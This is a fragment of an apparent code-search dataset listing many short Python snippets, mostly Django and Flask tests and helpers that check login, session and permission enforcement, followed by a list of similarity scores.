accessed\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_logged_in(self):\n response = self.c.get(reverse(map_page), {'lat': 34.0, 'lng': 45.3})\n self.assertEqual(response.status_code, 200)", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def test_login_required(self):\n self.client.logout()\n response = self.client.post(self.get_url(), {})\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def assert_accessible(self, url):\n try:\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.login()\n response = self.client.get(url, follow=True)\n self.assertEqual(response.status_code, 200)\n self.logout()\n except Exception as exc: # pragma: no cover\n exc.args += ((url),)\n raise", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def _check_session_valid(request):\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = 
True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def test_non_admin_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = True\n self.request.user.is_superuser = False\n self.request.user.is_staff = False\n nt.assert_equal(self.view.test_func(), False)", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def test_session_state_for_unused_flash(self):\n self.response = self.client.get(reverse(views.render_template))\n self.assertFalse(_SESSION_KEY in self.client.session)", "def test_unauthenticated(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_user_not_authorized(self):\n response = self.client.post(self.url)\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_04_admin_featured_apps_as_anonymous(self):\r\n res = self.app.get('/admin/featured', follow_redirects=True)\r\n assert \"Please sign in to access this page\" in res.data, res.data", "def test_category_view_not_logged_in(testapp):\n from webtest.app import AppError\n with pytest.raises(AppError, message=\"403 Forbidden\"):\n testapp.get('/category/1')", "def test_admin_can_login_to_web_portal(admin):", "def is_logged_in():\n return 'user' in session", "def test_journal_route_accessible_only_if_logged_in(self):\n response = self.client.get(reverse_lazy('journal'))\n self.assertEqual(response.status_code, 302)", "def user_in_session():\n return 'user_id' in login_session", "def test_dashboard_not_signed(self):\n views_url = ('/dashboard/',\n '/accounts/picture/')\n #create a get request\n for view in views_url:\n response = self.client.get(view)\n #the user was not logged in, the user should be redirected\n self.assertEqual(response.status_code, 302,\n msg=str(response.request))", "def test_func(self):\n return self.request.user.is_superuser", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n utils.test_can_access(self, self.url)", "def test_anonymous(self):\n self.logout_user()\n\n response = self.client.get(self.api_link)\n self.assertContains(response, \"sign in to use private threads\", status_code=403)", "def test_not_logged_in(self):\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n AnonymousUser(), album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n AnonymousUser(), album.display_photo, ALBUM_PUBLIC)", "def test_func(self):\n return self.request.user.has_permission(\"core.view_staffer\")", "def 
test_signin_page_bypass(self):\r\n # Test that they do signin if they don't have a cert\r\n response = self.client.get(reverse('signin_user'))\r\n self.assertEqual(200, response.status_code)\r\n self.assertTrue('login_form' in response.content\r\n or 'login-form' in response.content)\r\n\r\n # And get directly logged in otherwise\r\n response = self.client.get(\r\n reverse('signin_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_authentication_is_not_required(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_allowed_to_submit(request):\n return not settings.REQUIRE_LOGIN or request.user.is_authenticated()", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def assert_cannot_view(obj):\n selenium_utils.open_url(obj.url)\n assert ui_utils.is_error_403()", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def test_private_pages_auth(self):\r\n auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # These are pages that should just load when the user is logged in\r\n # (no data needed)\r\n simple_auth_pages = (\r\n '/course/',\r\n )\r\n\r\n # need an activated user\r\n self.test_create_account()\r\n\r\n # Create a new session\r\n self.client = AjaxEnabledTestClient()\r\n\r\n # Not logged in. 
Should redirect to login.\r\n print('Not logged in')\r\n for page in auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=302)\r\n\r\n # Logged in should work.\r\n self.login(self.email, self.pw)\r\n\r\n print('Logged in')\r\n for page in simple_auth_pages:\r\n print(\"Checking '{0}'\".format(page))\r\n self.check_page_get(page, expected=200)", "def test_registration_page_bypass(self):\r\n response = self.client.get(\r\n reverse('register_user'), follow=True,\r\n SSL_CLIENT_S_DN=self.AUTH_DN.format(self.USER_NAME, self.USER_EMAIL))\r\n self.assertEquals(('http://testserver/dashboard', 302),\r\n response.redirect_chain[-1])\r\n self.assertIn(SESSION_KEY, self.client.session)", "def test_homepage_logged_in_except(self):\r\n\r\n u1 = User.query.filter_by(username='testuser').one()\r\n u1.location = 'US-FAKE'\r\n db.session.add(u1)\r\n db.session.commit()\r\n\r\n with self.client as c:\r\n with c.session_transaction() as sess:\r\n sess[CURR_USER_KEY] = u1.id\r\n response = c.get('/')\r\n self.assertEqual(response.status_code, 200)\r\n self.assertIn(b'No data found for your region.', response.data)", "def test_instructor_page_access_nonstaff(self):\r\n self.login(self.enrolled_user)\r\n\r\n urls = [reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()}),\r\n reverse('instructor_dashboard', kwargs={'course_id': self.test_course.id.to_deprecated_string()})]\r\n\r\n # Shouldn't be able to get to the instructor pages\r\n for url in urls:\r\n check_for_get_code(self, 404, url)", "def test_shred_login():\n assert_redirect_to_login('/shred/')\n assert_not_redirect_to_login('/shred/')", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def test_get_main_page_without_logged_in_user(self):\n response = self.testapp.get('/')\n self.assertEqual(response.status_int, 200)", "def test_aio_can_login_to_web_portal(aio):", "def before_request() -> None:\n if current_user.is_anonymous() or not current_user.is_allowed():\n abort(401)", "def test_func(self):\n return self.request.user.is_active # any active user", "def test_page_view_permission(self):\n \n adminonlypage = create_page_in_admin(self.testproject,\"adminonlypage\",\n permission_lvl=Page.ADMIN_ONLY) \n registeredonlypage = create_page_in_admin(self.testproject,\"registeredonlypage\",\n permission_lvl=Page.REGISTERED_ONLY)\n publicpage = create_page_in_admin(self.testproject,\"publicpage\",\n 
permission_lvl=Page.ALL)\n \n self._test_page_can_be_viewed(self.projectadmin,adminonlypage)\n self._test_page_can_not_be_viewed(self.participant,adminonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,adminonlypage) \n self._test_page_can_not_be_viewed(None,adminonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,registeredonlypage)\n self._test_page_can_be_viewed(self.participant,registeredonlypage)\n self._test_page_can_not_be_viewed(self.registered_user,registeredonlypage)\n self._test_page_can_not_be_viewed(None,registeredonlypage) # None = not logged in\n \n self._test_page_can_be_viewed(self.projectadmin,publicpage)\n self._test_page_can_be_viewed(self.participant,publicpage)\n self._test_page_can_be_viewed(self.registered_user,publicpage)\n self._test_page_can_be_viewed(None,publicpage) # None = not logged in", "def logged_in(request):\n return request.current_user is not None", "def test_not_logged_cannot_create_tab(self):\n\n utils.test_not_logged_cannot_access(self, self.url, self.data)", "def test_user_isnt_admin():\n app = create_ctfd()\n with app.app_context():\n register_user(app)\n client = login_as_user(app)\n for page in ['pages', 'teams', 'scoreboard', 'chals', 'statistics', 'config']:\n r = client.get('/admin/{}'.format(page))\n assert r.location.startswith(\"http://localhost/login?next=\")\n assert r.status_code == 302\n destroy_ctfd(app)", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to anonymous users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should not be shown to authenticated users\"\r\n assert dom.find(id='top_users') is None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n res = self.signin(email=self.root_addr, password=self.root_password)\r\n print res.data\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def deny_access():\n flash('You must login first.')\n return redirect(url_for('home'))", "def test_logged_in_not_friend(self):\n\n # log in\n self.make_logged_in_not_friend()\n\n # test show album\n self.perm_escalate_helper(self.albumcontrol, self.showalbumrequest, self.testalbum, self.testalbum.id,\n self.u2, album.display_album, ALBUM_PUBLIC)\n\n # test photo view\n self.perm_escalate_helper_get_with_client(self.albumcontrol, self.testalbum, self.photo.id,\n \"photoid\", \"show_photo\", ALBUM_PUBLIC)\n\n # test individual photo view page\n self.perm_escalate_helper(self.albumcontrol, self.indivphotorequest, self.testalbum, self.photo.id,\n self.u2, album.display_photo, ALBUM_PUBLIC)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def 
test_returns_403_if_user_doesnt_have_PM_role(self):\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n )\n self.assertEqual(response.status_code, 403)", "def test_logged_user_can_access(self):\n\n utils.create_user_and_authenticate(self)\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def is_logged_in(session):\n return 'user' in session", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def test_01_front_page(self):\r\n url = '/'\r\n # As Anonymou user\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to anonymous users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n # As Authenticated user but NOT ADMIN\r\n self.signin()\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to authenticated users\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout\r\n # As Authenticated user but ADMIN\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.get(url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Top users should be shown to admin\"\r\n assert dom.find(id='top_users') is not None, err_msg\r\n self.signout()", "def login_web_required(view_func):\r\n @wraps(view_func, assigned=available_attrs(view_func))\r\n def _wrapped_view_func(request, *args, **kwargs):\r\n if hasattr(request, \"session\") and request.session.get('is_logon', False) and request.user.is_active:\r\n return view_func(request, *args, **kwargs)\r\n else:\r\n return HttpResponse(FailResponse(u'请先登录'))\r\n return _wrapped_view_func", "def test_if_an_user_c_access_administration_panel(client):\n response = client.get(\"/admin/\")\n assert response.status_code != 200", "def testDenyAllowAccess(self):\n self.host.ContinueAuth()\n self.host.SignIn(self.account['username'], self.account['password'])\n self.host.DenyAccess()\n self.host.ContinueAuth()\n self.host.AllowAccess()", "def test_no_redirect(self):\n self.create_user_and_login(\n agreed_to_terms_of_service=True,\n filled_out=True\n )\n\n resp = self.client.get(DASHBOARD_URL)\n assert resp.status_code == 200", "def __require_privilaged_access(self):\n if not self.getLoggedInUser():\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"The server must be start by using privilaged access to \"\n \"execute this action.\")", "def test_no_access_without_login(self):\n response = self.client.get(reverse('question_list'), follow=True)\n expected_url = reverse('home') + \"?next=\" + reverse('question_list')\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)\n expected_url = reverse('home') + \"?next=\" + reverse('question_add')\n response = self.client.get(reverse('question_add'), follow=True)\n self.assertRedirects(response, expected_url, status_code=302, \n target_status_code=200)", "def test_assessor_access_limited(self):\n assessor = get_or_create_default_assessor()\n self.client.login(assessor.email)\n # This assessor doesn't belong to a group\n self.assertTrue(is_assessor(assessor))\n 
self.assertFalse(get_user_assessor_groups(assessor))\n\n # forbidden\n urls_get_forbidden = [\n reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n reverse('wl_applications:enter_conditions_assessor', args=[self.application.pk, self.assessment.pk]),\n ]\n urls_post_forbidden = [\n {\n 'url': reverse('wl_applications:create_condition', args=[self.application.pk]),\n 'data': {\n 'code': '123488374',\n 'text': 'condition text'\n }\n },\n {\n 'url': reverse('wl_applications:set_assessment_condition_state'),\n 'data': {\n 'assessmentConditionID': self.assessment_condition.pk,\n 'acceptanceStatus': 'accepted',\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions', args=[self.application.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n {\n 'url': reverse('wl_applications:enter_conditions_assessor',\n args=[self.application.pk, self.assessment.pk]),\n 'data': {\n 'conditionID': [self.condition.pk],\n }\n },\n ]\n # Allowed\n urls_get_allowed = [\n reverse('wl_applications:search_conditions')\n ]\n urls_post_allowed = [\n ]\n for url in urls_get_forbidden:\n response = self.client.get(url, follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_post_forbidden:\n response = self.client.post(url['url'], url['data'], follow=True)\n if response.status_code != 403:\n self.assertRedirects(response, reverse('wl_dashboard:tables_assessor'), status_code=302,\n target_status_code=200)\n for url in urls_get_allowed:\n response = self.client.get(url, follow=True)\n self.assertEqual(200, response.status_code)\n\n for url in urls_post_allowed:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEqual(200, response.status_code)", "def test_webdriver_not_authenticated(live_server, env_browser):\n browser = env_browser\n browser.get(flask.url_for(\"security.change_password\", _external=True))\n assert flask.url_for(\"security.login\", _external=True) in browser.current_url", "def test_login_required(self):\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_not_logged_user_cannot_leave(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def session_required(view):\n def validation(*args, **kwargs):\n request = args[0]\n if request.session.get('email', None):\n return view(*args, **kwargs)\n else:\n return HttpResponseForbidden('403 Forbbiden, You have to login first to use this amazing app')\n return validation", "def test_login_required():\n pass", "def is_impersonated_session(request):\n return (\n hasattr(request, \"session\") and la_settings.USER_SESSION_FLAG in request.session\n )", "def test_not_logged_cannot_delete(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_authenticated(self):\n response = self.client.get(telemetry_url)\n self.assertEqual(403, response.status_code)", "def test_00_anonymous(self):\r\n res = self.app.get(self.url, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"The CKAN exporter should not be available for anon users\"\r\n assert dom.find(id=\"ckan\") is None, err_msg", "def test_token(self):\n api_response = requests.get(self.api_config.get_api_url() + \"greetings/isloggedin\",\n headers={\"Authorization\": \"Bearer \" + self.API_TOKEN})\n\n if api_response.status_code == 401 or 403:\n return False\n else:\n return True", "def 
test_auth_public_unowned(self):\n self.do_visible(True, 'pattieblack', True, tenant='froggy')", "def test_anonymous_user(self):\r\n self.request.user = AnonymousUser()\r\n context = user_has_cart_context_processor(self.request)\r\n self.assertFalse(context['display_shopping_cart'])", "def test_if_forbiden_for_authenticated_permissions(self):\r\n res = self.client_authenticated.get(reverse(LIST_USER_URL),data={})\r\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)" ]
[ "0.7482324", "0.7440397", "0.7440397", "0.7440397", "0.7440397", "0.7383309", "0.707093", "0.7003852", "0.6998608", "0.6921593", "0.68799853", "0.6807848", "0.6807848", "0.6783388", "0.67709535", "0.6742237", "0.67224073", "0.6720221", "0.6720221", "0.6720221", "0.669822", "0.6676338", "0.66504043", "0.66504043", "0.66504043", "0.66504043", "0.6645153", "0.6621275", "0.6596097", "0.65860206", "0.65636677", "0.6563315", "0.65596586", "0.6552794", "0.654565", "0.6538141", "0.65232", "0.65230846", "0.64935756", "0.64922774", "0.6478924", "0.64678633", "0.64616287", "0.6456271", "0.64519906", "0.64479584", "0.64479584", "0.64479584", "0.64479584", "0.6427748", "0.64264274", "0.642532", "0.6423111", "0.6422225", "0.6415429", "0.6408262", "0.64079136", "0.6407329", "0.6407329", "0.6407329", "0.6407329", "0.6403552", "0.64012057", "0.6392876", "0.637878", "0.63746595", "0.6374236", "0.6370098", "0.6366382", "0.63659036", "0.6360152", "0.6347357", "0.63405573", "0.6336323", "0.6321056", "0.6321056", "0.6321056", "0.63066447", "0.6301901", "0.63009095", "0.6291129", "0.628317", "0.62816125", "0.6281249", "0.6279987", "0.62748647", "0.6274433", "0.6273688", "0.62682015", "0.62535775", "0.6251592", "0.6247027", "0.62462574", "0.6243556", "0.62421054", "0.62303126", "0.6225438", "0.62207896", "0.62184554", "0.6217577", "0.6213295" ]
0.0
-1
Test if user's favourite restaurant is added to DB
def test_add_to_fav_(self):
    result = self.client.post("/add_to_fav", data={"yelp_biz_id": "JA_V9TqDCrkgknqrcUndIQ",
                                                   "yelp_rest_name": "Siam",
                                                   "yelp_rating": "4",
                                                   "yelp_category": "Thai",
                                                   "yelp_price": "$$",
                                                   "yelp_image_url": "https://s3-media2.fl.yelpcdn.com/bphoto/1SkZwZrRZkQSzRMn_Trs3w/o.jpg"})

    DB_result = Restaurant_details.query.filter_by(biz_id="JA_V9TqDCrkgknqrcUndIQ").first()
    self.assertIsNotNone(DB_result)  # testing that the returned result is not NONE
    self.assertEqual(DB_result.restaurant_name, 'Siam')  # testing restaurant name is what it should be
    self.assertIn(b"Your Favourite has been saved", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_Favourite(self):\n self.assertEquals(self.fav_1.pk, 1)\n self.assertEquals(self.fav_1.date_added, '2019-12-20 09:00:00')\n self.assertEquals(self.fav_1.user.pk, 1)\n self.assertEquals(self.fav_1.product.pk, 1)", "async def create(self, favorite: Favorite) -> Favorite:", "def test_get(self, init_db, favorite):\n assert Favorite.get(favorite.id) == favorite", "def favorite(user, wine):\n\n favorite = Favorite(user=user, wine=wine)\n\n db.session.add(favorite)\n db.session.commit()\n\n # return favorite", "def update_favorites():\n\n check_favorite = Favorite.query.filter(Favorite.favorited_item==session[\"athlete_id\"]).first()\n route = f'/athletes/{session[\"athlete_id\"]}'\n\n if check_favorite is None:\n new_update = Favorite(id=current_user.id, favorited_item=session[\"athlete_id\"])\n db.session.add(new_update) \n \n else:\n db.session.delete(check_favorite)\n \n db.session.commit()\n \n return redirect(route)", "def test_user_model(self):\n\n u = User(\n email=\"[email protected]\",\n username=\"testuser\",\n password=\"HASHED_PASSWORD\",\n phone_number=None,\n image_url=None,\n )\n\n db.session.add(u)\n db.session.commit()\n\n self.assertEqual(len(u.favorites), 0)", "def insert_in_favourite(self, food_id, substitute_id):\n\n ref = (food_id, substitute_id)\n print(\"\"\"\\n Souhaitez-vous ajouter cette recherche dans vos favoris ?\n 1. Oui\n 0. Non \"\"\")\n\n choice = int(input(\"Entrez votre choix: \\n\"))\n if choice == 1:\n self.cursor.execute(\"\"\"INSERT INTO favourite\n (food_id, substitute_id)\n VALUES (%s, %s)\"\"\", ref)\n else:\n return", "def add_favourite(recipe_id):\r\n if \"user\" in session:\r\n user = coll_users.find_one(\r\n {\"username_lower\": session[\"user\"]})[\"_id\"]\r\n coll_users.update_one(\r\n {\"_id\": ObjectId(user)},\r\n {\"$push\": {\"user_favs\": ObjectId(recipe_id)}})\r\n coll_recipes.update(\r\n {\"_id\": ObjectId(recipe_id)}, {\"$inc\": {\"favourites\": 1}})\r\n return redirect(url_for(\r\n \"recipes.recipe_detail\",\r\n recipe_id=recipe_id))\r\n else:\r\n flash(\"You must be logged in to perform that action!\")\r\n return redirect(url_for(\"users.login\"))", "def favourite():\n\n # user is adding or deleting a favourite\n if request.method == \"POST\":\n\n # user is adding a station from 'stations.html'\n if request.form.get(\"add\"):\n\n # max limit of 5 favourites per user\n if len(Favourite.query.filter(Favourite.user_id==session[\"user_id\"]).all()) > 4:\n\n return redirect(url_for(\"stations\", error=\"limit\"))\n\n # remember id of station to add\n station_id = request.form.get(\"add\")\n\n # check user hasn't already favourited station\n if(Favourite.query.filter(Favourite.user_id==session[\"user_id\"],Favourite.station_id==station_id).first()):\n\n return redirect(url_for(\"stations\", error=\"taken\"))\n\n # add favourite to db for user\n addFav = Favourite(user_id=session[\"user_id\"],station_id=station_id)\n db.session.add(addFav)\n db.session.commit()\n\n return redirect(url_for(\"stations\", success=True))\n\n # user is deleting a station from 'favourites.html'\n elif request.form.get(\"delete\"):\n\n station_id = request.form.get(\"delete\")\n\n delFav = Favourite.query.filter(Favourite.user_id==session[\"user_id\"],Favourite.station_id==station_id).first()\n db.session.delete(delFav)\n db.session.commit()\n\n return redirect(url_for(\"favourite\", deleted=True))\n\n # user is viewing favourites via GET\n else:\n favourites = Favourite.query.filter(Favourite.user_id==session[\"user_id\"]).all()\n\n return 
render_template(\"favourites.html\", username=get_username(), favourites=favourites)", "def add_favorite(request):\n print(\"La fonction pour ajouté un produit est appelé\")\n query = request.GET.get('_substitute_product','')\n print(query)\n # query_favorite = query.id\n query_name = Product.objects.get(name=query)\n print(query_name)\n print(\"ID DU PRODUIT\")\n username = request.user\n user_id = request.user.id\n # user = User.objects.get(id=username)\n print(username)\n print(\"ID DE L'USER\")\n if query_name is not None:\n try: \n UserFavorite.objects.get(user_name=username, product=query_name)\n print(\"Ce produit est déjà dans vos favoris.\")\n except ObjectDoesNotExist:\n new_favorite = UserFavorite.objects.create(user_name=username,product=query_name)\n new_favorite.save()\n print(\"Le produit a bien été enregistré.\")\n else:\n pass\n return redirect('favorits')\n # return render(request,'index.html')", "def add_visit():\n\n # checks to see if user is logged in\n\n if session.get('username'):\n username = session['username']\n user = User.query.filter_by(username=username).first()\n\n # finds the friend searched for on the database\n friend = request.args.get(\"friend\")\n friend_user = User.query.filter_by(username=friend).first()\n\n when = request.args.get(\"when\")\n user_rating = Decimal(request.args.get(\"rating\"))\n\n # finds the restaurant's ID, adds the restaurant to the database if not in yet\n restaurant = request.args.get(\"name\")\n yelp_id = request.args.get(\"id\")\n avg_rating = request.args.get(\"avg_rating\")\n price_lvl = request.args.get(\"price\")\n review_count = request.args.get(\"rc\")\n categs = request.args.get(\"categs\")\n list_categs = categs.split(\",\")\n\n if not Restaurant.query.filter_by(name=restaurant).all():\n new_restaurant = Restaurant(yelp_id=yelp_id,\n name=restaurant,\n rating=avg_rating,\n price=turn_to_nums(price_lvl),\n review_count=review_count)\n db.session.add(new_restaurant)\n db.session.commit()\n\n rest_id = db.session.query(Restaurant.id).filter_by(yelp_id=yelp_id).first()[0]\n if not Category.query.filter_by(rest_id=rest_id).all():\n if len(list_categs) == 3:\n categ1, categ2, categ3 = list_categs\n elif len(list_categs) == 2:\n categ1, categ2 = list_categs\n categ3 = None\n else:\n categ1 = list_categs\n categ2 = None\n categ3 = None\n new_categs = Category(rest_id=rest_id,\n categ1=categ1,\n categ2=categ2,\n categ3=categ3)\n db.session.add(new_categs)\n db.session.commit()\n\n # Adding to the visits and uservisits tables\n new_visit = Visit(rest_id=rest_id, date=when)\n db.session.add(new_visit)\n db.session.commit()\n new_visit_id = db.session.query(Visit.id).filter_by(rest_id=rest_id,\n date=when).order_by(Visit.date.desc()).first()[0]\n new_visit_exp = UserExp(visit_id=new_visit_id,\n user_id=user.id,\n rating=user_rating)\n f_new_visit_exp = UserExp(visit_id=new_visit_id,\n user_id=friend_user.id)\n db.session.add(new_visit_exp)\n db.session.add(f_new_visit_exp)\n db.session.commit()\n return \" <span class='label label-success'>Saved!</span>\"\n\n # if not logged in, cannot save\n else:\n return \" <a href='/login'><span class='label label-default'>Login to save</span></a>\"", "def save_to_favorites_list():\n\n #get show id from the event handler/post request\n show_id = str(request.form.get(\"id\"))\n #get button content from the event handler/post request\n button_content = request.form.get(\"button_content\")\n\n button_content_encoded = button_content.encode('utf-8')\n\n #save utf-8 encoded checkmark as a string 
variable\n check_mark = \"\\xe2\\x9c\\x93\"\n\n #find the current logged in user\n email = session.get(\"current_user\")\n\n if email:\n\n #use email to find the user_id\n user_id = User.find_user_id_with_email(email)\n\n #if the show has not been favorited yet\n if check_mark not in button_content_encoded:\n #add row in favorites table\n favorite = Favorite.add_to_favorites(show_id, user_id)\n\n #pass back the show_id and that the show has been favorited\n payload = {\"show_id\":show_id,\"favorite\":\"True\"}\n return jsonify(payload)\n else:\n #delete row in favorites table\n Favorite.delete_favorite(show_id)\n\n #pass back the show_id and that the show has been unfavorited\n payload = {\"show_id\":show_id,\"favorite\":\"False\"}\n return jsonify(payload)\n else:\n flash(\"You need to be logged in to see that page.\")\n return redirect(\"/login\")", "def test_save(self, init_db, category1):\n params = {\n 'title' : fake.alphanumeric(15),\n 'description' : fake.alphanumeric(200),\n 'ranking' : 1,\n 'meta_data' : {\n 'color' : 'red',\n 'quantity' : 2,\n 'date_purchased' : '2019-02-05',\n 'condition' : 'bad'\n },\n 'category_id' : category1.id\n }\n\n favorite = Favorite(**params)\n assert favorite == favorite.save()", "def insert_favorite_food(self, user_answer_id_food, name_substitute):\n self.cursor = self.data_base.cursor(MySQLCursorPrepared)\n save_favorite_food = \"\"\"INSERT INTO Favorite\n (id_food, id_substitute_chooses)\n VALUES({0}, \n (SELECT id FROM Food WHERE name_food = {1}))\"\"\" \\\n .format(int(user_answer_id_food),\n \"\\'\" + name_substitute + \"\\'\")\n self.cursor.execute(save_favorite_food)\n self.data_base.commit()", "def favorite():\n # handle pre-flight for browsers CORS access\n if request.method == \"OPTIONS\":\n return generate_response()\n # part1: verify the token\n checked_and_verified, response = check_verify_token(request,login_session)\n if checked_and_verified == False: return response\n # handle the edge case where user is authorized to perform create user but not other method\n if not is_loggedin(login_session):\n response = generate_message(MESSAGE_USER_NOT_LOGGED_IN,401)\n return response\n # handles the get request\n if request.method == \"GET\":\n favorites = 